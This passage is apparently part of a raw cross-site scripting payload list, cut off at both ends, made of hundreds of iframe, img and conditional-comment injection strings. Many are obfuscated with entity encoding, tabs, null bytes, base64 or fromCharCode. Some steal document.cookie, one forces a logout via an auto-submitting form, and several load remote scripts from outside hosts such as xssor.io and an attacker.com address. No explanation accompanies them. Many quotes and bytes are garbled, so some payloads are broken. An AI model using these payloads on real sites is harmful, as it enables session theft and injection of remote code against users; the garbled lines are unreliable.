Tab;&Tab;&Tab;&Tab;%29></iframe> ?
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<iframe/src=j&Tab;av&Tab;as&Tab;cri&Tab;pt&Tab;:co&Tab;nfir&Tab;m&Tab;(&Tab;&Tab;1&Tab;)>
<iframe src=//localhost/self/logout.php
<iframe src=LOGOUT_URL onload=forms[0].submit()>
<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
“><iframe src=’’ onload=alert(‘atul’)>
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
<iframe/src \/\/onload = prompt(1)
“><iframe/src \/\/onload = prompt(1)
<IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>
<iframe src=”” onmouseover=”confirm(document.cookie)”>
<iframe src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
<iframe src=?p=%26lt;svg/o%256Eload%26equals;alert(1)%26gt;>
<iframe src=%(scriptlet)s <
<iframe src=””srcdoc=”data:,&lt;svg/onload&equals;alert(191)>”191=” sandbox>
<iframe src=””/srcdoc=’&lt;svg onload&equals;alert&lpar;1&rpar;&gt;’>
<iframe src=”#” style=width:exp/**/ressi/**/on(confirm(1))>
<iframe src=”&Tab;javascript:prompt(1)&Tab;”>
<iframe src=”&Tab;javascript:prompt(1)&Tab;”>
<iframe src=’//target.com/vulnpage.php?a=%1B$*H%1BN&b=%20type=image%20src=x%20onerror=alert(document.characterSet);//’>
<iframe src=//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>
<iframe src=//targetsite?xss=<svg/onload%00=%00locatio%00n=nam%00e
><iframe src=/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)
“><iframe src=”/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)”
<iframe src=”vbscript:document.vulnerable=true;”>
<iframe src=”vbscript:msgbox(1)”></iframe>
<iframe src=”vbscript:msgbox(1)”></iframe> (IE)
<iframe src=”\x01javascript:alert(0)”></iframe> <! — Example for Chrome →
<iframe src=”&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;”></iframe>
<iframe src=”x-javascript&colon;alert(document.domain);”></iframe>
<iframe src=x onerror=prompt(1)>
<iframe style=display:none name=x></iframe>
<iframe style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
“><iframe style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
<iframe style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
<iframe width=0 height=0 src=”javascript:confirm(1)”>
<IFRAME width=”420" height=”315" frameborder=”0" onload=”alert(document.cookie)”></IFRAME>
<iframe xmlns=”#” src=”javascript:alert(1)”></iframe>
<! — [if]><script>alert(1)</script →
<! — [if]><script>alert(1)</script →
<! — [if]><script>alert(1)</script → <! — [if<img src=x onerror=alert(1)//]> →
<! — [if]><script>alert(1)</script → // Works upto IE9 ?http://html5sec.org/#115
<! — [if]><script>confirm(1)</script →
<! — [if]><script>javascript:alert(1)</script →
<! — [if WindowsEdition]><script>confirm(location);</script><![endif] →
<image img=javascript:alert(XSS@%2Bdocument.domain caption= />
<image src=1 href=1 onerror=”javascript:alert(1)”></image>
<image src=”https://github.com/dummy.jpa href=1 onerror=”javascript:alert(document.cookie)”></image>
<image src=”javascript:alert(1)”>
<image src=”javascript:alert(2)”> // IE6, O10.10, OM10.0
<image xlink:href=”data:image/svg+xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/>
<IMG />”>
<IMG />
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
<img%09onerror=alert(1) src=a>
<IMG%0aSRC%0a=%0a”%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a’%0aX%0aS%0aS%0a’%0a)%0a”%0a>
<IMG%20DYNSRC=”javascript:alert(‘WXSS’)”>
<IMG%20LOWSRC=”javascript:alert(‘WXSS’)”>
<IMG%20"””><SCRIPT>alert(“WXSS”)</SCRIPT>”>
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG%20SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG%20SRC=”%20&#14;%20javascript:alert(‘WXSS’);”>
<IMG%20SRC=’%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)’>
=<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>
>”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
>”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;confirm(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
<IMG%20SRC=’javasc ript:alert(document.cookie)’>
<IMG%20SRC=’javascript:alert(document.cookie)’>
<IMG%20SRC=javascript:alert(&quot;WXSS&quot;)>
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC=`javascript:alert(“‘WXSS’”)`>
<IMG%20SRC=”jav ascript:alert(‘WXSS’);”>
<IMG%20SRC=”javascript:alert(‘WXSS’);”>
<IMG%20SRC=”javascript:alert(‘WXSS’)”
<IMG%20SRC=javascript:alert(‘WXSS’)>
<IMG%20SRC=JaVaScRiPt:alert(‘WXSS’)>
<IMG%20SRC=”jav&#x09;ascript:alert(‘WXSS’);”>
<IMG%20SRC=”jav&#x0A;ascript:alert(‘WXSS’);”>
<IMG%20SRC=”jav&#x0D;ascript:alert(‘WXSS’);”>
<img%20src=x%20onerror=alert(1)>
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<img=”=”%20title=’”><img src=”=”onerror=alert(1)>”>’
<img[a][b][c]src[d]=x[e]onerror=[f]”alert(1)”>
<img/alt=1 onerror=eval(src) src=x:alert(alt) >
<![><IMG ALT=”]><SCRIPT>confirm(1)</SCRIPT>”>
<IMG ALT=”><SCRIPT>confirm(1)</SCRIPT>”(EOF)
<img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e>
<IMG DYN id=XSS SRC=”javascript:alert(‘XSS’)”>
<IMG DYNid=XSS SRC=”javascript:alert(‘XSS’)”>
<IMG+DYNSRC=”javascript:alert(1);”>
<IMG DYNSRC=”javascript:alert(‘XhSS’)”>
<;IMG DYNSRC=”;javascript:alert(‘;XSS’;);”;>;
<IMG DYNSRC=”javascript:alert(‘XSS’);”>
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
<IMG DYNSRC=”javascript:alert(XSS)”>
<IMG DYNSRC=\”javascript:alert(‘XSS’)\”>
<IMG DYNSRC=”javascript:confirm(document.location)”>
<img dynsrc=”javascript:document.vulnerable=true;”>
<img DYNSRC=”javascript:document.vulnerable=true;”>
<IMG DYNSRC=”javascript:javascript:alert(1)”>
<IMG DYNSRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
<img/id=”alert&lpar;&#x27;XSS&#x27;&#x29;\”/alt=\”/\”src=\”/\”onerror=eval(id&#x29;>
<img id=��><��class=��><��src=��>��onerror=alert(9)>
<img/id=”confirm&lpar;1)”/alt=”/”src=”/”onerror=eval(id)>’”>
<IMG id=XSS SRC=”&14;javascript:alert(‘XSS’);”>
<IMG id=XSS SRC=&{alert(‘XSS’);};>
<img id=XSS SRC=”blah>”onmouseover=”alert(‘XSS’);”>
<img id=XSS SRC=”blah”onmouseover=”alert(‘XSS’);”>
<IMG id=XSS SRC=”jav
<IMG id=XSS SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
<IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG id=XSS SRC=`javascript:alert(“‘XSS’”)`>
<IMG id=XSS SRC=’javascript:alert(‘XSS’)
<IMG id=XSS SRC=” javascript:alert(‘XSS’);”>
<IMG id=XSS SRC=”jav ascript:alert(‘XSS’);”>
<IMG id=XSS SRC=”jav ascript:alert(‘XSS’);”>
<IMG id=XSS SRC=”javascript:alert(‘XSS’);”>
<IMG id=XSS SRC=”javascript:alert(‘XSS’)”
<IMG id=XSS SRC=javascript:alert(‘XSS’)>
<IMG id=XSS SRC=javascript:alert(“XSS”)>
<IMG id=XSS SRC=JaVaScRiPt:alert(‘XSS’)>
<IMG id=XSS SRC=”livescript:[code]”>
<IMG id=XSS SRC=”mocha:[code]”>
<IMG id=XSS SRC=’vbscript:msgbox(“XSS”)’>
><img id=XSS SRC=x onerror=alert(XSS);>
<IMG id=XSS STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
<img+<iframe =”1" onerror=”alert(1)”>
<img language=vbscript src=<b onerror=”alert 1">
<img language=vbscript src=<b onerror=”alert 1"> // IE 8
<img language=vbs src=<b onerror=alert#1/1#>
<img language=vbs src=<b onerror=confirm#1/1#>
<img longdesc=”src=” images=”” stop.png”=”” onerror=”alert(document.domain);//&quot;” src=”x” alt=”showme”>
<<img longdesc=”src=’x’onerror=alert(document.domain);//><img “ src=’showme’>
<img longdesc=”src=’x’onerror=eval(window.atob(‘aW5jbHVkZT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtpbmNsdWRlLnNyYz0naHR0cHM6Ly9hdHRhY2tlci5jb20vYXRtYWlsLmpzJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGluY2x1ZGUpOw==’));//><img “ src=’showme’>
<IMG LOW id=XSS SRC=”javascript:alert(‘XSS’)”>
<IMG LOWid=XSS SRC=”javascript:alert(‘XSS’)”>
<IMG+LOWSRC=”javascript:alert(1);”>
<IMG LOWSRC=”javascript:alert(‘XiSS’)”>
<;IMG LOWSRC=”;javascript:alert(‘;XSS’;);”;>;
<IMG LOWSRC=”javascript:alert(‘XSS’);”>
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
<IMG LOWSRC=\”javascript:alert(‘XSS’)\”>
<IMG LOWSRC=”javascript:confirm(document.location)”>
<img LOWSRC=”javascript:document.vulnerable=true;”>
<IMG LOWSRC=”javascript:javascript:alert(1)”>
<IMG LOWSRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
‘“><img onerror=alert(0) src=><”’
<img onerror=alert(1) src <u></u>
<img onerror=event.path.pop().alert(1) src>
<img onerror=”location=’javascript:%61lert(1)’” src=”x”>
<img onerror=”location=’javascript:=lert(1)’” src=”x”>
<img onerror=”location=’javascript:\x255Cu0061lert(1)’” src=”x” >
<img onerror=”location=’javascript:\x2561lert(1)’” src=”x”>
“/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
“/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
“/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
“/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
“/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
“/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
“/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
“/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
“/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
<img onload=alert(1)>//INJECTX
><img onmouseover=alert(Xss)>
��><img onmouseover=alert(��Xss��)>
><img onmouseover=alert(Xss-By-Muhaddi)>
<IMG onmouseover=”alert(‘xxs’)”>
<IMG onmouseover=”alert(“xxs”)”>
<IMG onmouseover =confirm(1)>
<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
<img =”><script>alert(1)</script>”>
<img “””><script>alert(“XSS by \nxss”)</script><marquee><h1>XSS by xss</h1></marquee>
<img><script>alert(‘xss’)</script>”>
<;IMG “;”;”;>;<;SCRIPT>;alert(“;XSS”;)<;/SCRIPT>;”;>;
<IMG ><SCRIPT>alert(XSS)</SCRIPT>>
<IMG “””><SCRIPT>alert(‘XSS’)</SCRIPT>”>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000039&#0000041>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
<img/src=`%00` /id=confirm(1) /onerror=eval(id)
<img/src=%00 id=confirm(1) onerror=eval(id)
<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
<img src=`%00`&NewLine; onerror=confirm(1)&NewLine;
<img/src=`%00` onerror=this.onerror=confirm
<img/src=`%00` onerror=this.onerror=confirm(1)
<img/src=`%00` onerror=this.onerror=confirm(1)
<img src=&#04jav&#13;ascr&#09;ipt:al&#13;ert(0)>
<img src=&#04jav&#13;ascr&#09;ipt:i=”x=docu&#13;ment.createElement(‘\u0053\u0043\u0052\u0049\u0050\u0054’);x.src=’http://xssor.io/xn.js';x.defer=true;doc&#13;ument.getElementsByTagName('head')[0].appendChild(x)";execScri&#13;pt(i)>
<img src=&#04jav&#13;ascr&#09;ipt:i=”x=document.createElement(‘script’);x.src=’http://xssor.io/xn.js';x.defer=true;document.getElementsByTagName('head')[0].appendChild(x)";execScript(i)>
<img src=’0' onerror=with(document)body.appendChild(createElement(‘script’)).src=’domain.js’>
\”><img Src=0x94 onerror=alert(0x000123)>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
<IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#39;&#41;>
<img src=”&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;”>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
<;IMG SRC=”; &;#14; javascript:alert(‘;XSS’;);”;>;
<IMG SRC=” &#14; javascript:alert(‘XSS’);”>
<IMG SRC=” &#14; javascript:alert(‘XSS’);”>
<IMG SRC=” &#14; javascript:confirm(document.location);”>
<img SRC=” &#14; javascript:document.vulnerable=true;”>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<img src=1 href=1 onerror=”javascript:alert(1)”></img>
<img src=1 href=1 onerror=”javascript:alert(document.domain)”></img>
<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
<img src=’1' onerror=’alert(0)’ <
<img src=’1' onerror/=alert(0) />
<img src=’1'’onerror=’alert(0)’>
<img src=’1'”onerror=”alert(0)”>
<img src=’1'onerror=alert(0)>
<img/src=’1'/onerror=alert(0)>
<img src=”1" onerror=”alert(‘1’)”>
<img src=”1" onerror=”alert(1)” />
<img src=1 onerror=alert(1)>
“]<img src=1 onerror=alert(1)>
“><img src=1 onerror=alert(1)>.gif
<img src=1 onerror=”alert(52)”
<img src=1 onerror=alert(document.domain)>
“]<img src=1 onerror=confirm(1)>
<img src=1 onerror=’document.write(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,4747,97,116,116,97,99,107,101,114,46,99,111,109,47,99,111,100,101,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41,59)));’>
<img src=1 onerror=Function(“aler”+”t(documen”+”t.domain)”)()>
/#<img src=1 onerror=javascript:confirm(3)>
<img src=1 onerror=jQuery.getScript(“domain.js”)>
<img src=’1' onerror=\x00alert(0) />
<img src=’1' onerror\x00=alert(0) />
<img src=’1' onerror\x0b=alert(0) />
<img src=”1" onerror=”&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;” />
<img src=”1" onnerror=”alert(1)”>
<img src=’1' o\x00nerr\x00or=alert(0) />
<img src=1 style=”font-fam\22onerror\3d alert\28 1\29\20 ily:’aaa’;\”>
<img src=’1'\x00onerror=alert(0)>
<img/src=@&#32;&#13; onerror = prompt(‘&#49;’)
<img src=”5" onerror=eval(“\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29”)></img>
<img src=”5"onerror=eval(“\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29”)></img>
<img src=”a”
<img/src=aaa.jpg onerror=prompt(1);
<img/src=aaa.jpg onerror=prompt(1);>
<img/src=aaa.jpg onerror=prompt(1);
/> <img src=’aaa’ onerror=confirm(document.domain)>
“/> <img src=’aaa’ onerror=confirm(document.domain)>
<img src=��\����<a href=’��>����onerror=alert(9)>
<img/src=”.”alt=””onerror=”alert(‘zombie’)”/>
<img src=��\��a=��>��onerror=alert(9)>
<img src=”a” onerror=’eval(atob(“cHJvbXB0KDEpOw==”))’>
<img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))>
<img src=a onerror=setInterval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))>
<img src=a onerror=setInterval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))> // Using String.fromcharcode function
<img src=asdf onerror=alert(document.cookie)>
<img src attribute src=”data:image/svg+xml;base64,
<img src=”blah>” onmouseover=”document.vulnerable=true;”>
<img src=”blah”onmouseover=”document.vulnerable=true;”>
<img src=<b onerror=alert(‘renwax23’);>
<img src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs= onload=alert(1)>
<img src=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”>
<img / src = \ ‘dfdfd \’ // onerror = \ ‘alert (document.cookie) \ ‘>
<img src=&{document.vulnerable=true;};>
<img src=evil.swf>
<img src=foo.png onerror=alert(/xssed/) />
<img src=foo.png onerror=alert(/xssed/) />
<img src=http://127.0.0.1/myspace.asp>
<img/src=’http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
<img+src=”http://localhost">
<img src=”http://teamultimate.in/wp-content/uploads/2017/03/slide-main.png">
<img src=��http://victim/newUser?name=<script>alert(1)</script>��/>
<img src=http://victim/newUser?name=<script>alert(1)</script>/>
<img src=”http://www.baidu.com/img/bdlogo.gif">
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
<img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> #
<img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">
<IMG src=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<;IMG SRC=”;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
<IMG SRC=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<img src=”http://www.w3schools.com/tags/planets.gif" width=”145" height=”126" alt=”Planets” usemap=”#planetmap”><map name=”planetmap”><area shape=”rect” coords=”0,0,145,126" a-=”>” href=”j&#x61;vascript:&#x61;lert(-1)”></map>
<img src=������id=’<img src=����>��onerror=alert(9)>
<img src=��<img src=’<img src=.>��>��onerror=alert(9)>
<! — <img src=” →<img src=x onerror=alert(1)//”>
<![><img src=”]><img src=x onerror=alert(1)//”>
<! — <img src=” →<img src=x onerror=alert(123)//”>
<! — <img src=” →<img src=x onerror=alert(1)//”>//INJECTX
<! — <img src=” →<img src=x onerror=alert(XSS)//”>
<![><img src=”]><img src=x onerror=alert(XSS)//”>
<! — <img src=” →<img src=x onerror=javascript:alert(1)//”>
<![><img src=”]><img src=x onerror=javascript:alert(1)//”>
<img src=i onerror=eval(jQuery.getScript(‘domain.js’))>
<img src ?itworksonchrome?\/onerror = alert(1)>
<img src ?itworksonchrome?\/onerror = alert(1)
<img src ?itworksonchrome?\/onerror = alert(1)???
<img src ?itworksonchrome?\/onerror = alert(1)
<img src ?itworksonchrome?\/onerror = confirm(1)???
<img src ?itworksonchrome?\/onerror = confirm(1)
<img src=”jar:!/”>
<IMG+SRC=”jav%09ascript:alert(1);”>
<IMG+SRC=”jav%0dascript:alert(1);”>
<IMG SRC=java%00script:confirm(document.location)>
“<IMG src=java\0script:alert(\”XSS\”)>”;’ > out
<iMgSRC = “JavaScript:alert(0);”>
<img src=”javascript:alert(1)”>
<IMG SRC=&{javascript:alert(1);};>
<img src=”java&#script:alert(/1231/);”>
<img src=”javascript:alert(2)”>
?img src=javascript:alert(document.domain)//.swf ?
<img src=javascript:alert(&quot;XSS&quot;)>
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS&quot;)>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
<;IMG SRC=`javascript:alert(“;RSnake says, ‘;XSS’;”;)`>;
<IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
<IMG SRC=`javascript:alert(“RSnake says### ‘XSS’”)`>
<IMG SRC=javascript:alert(String.fromCharCode(88
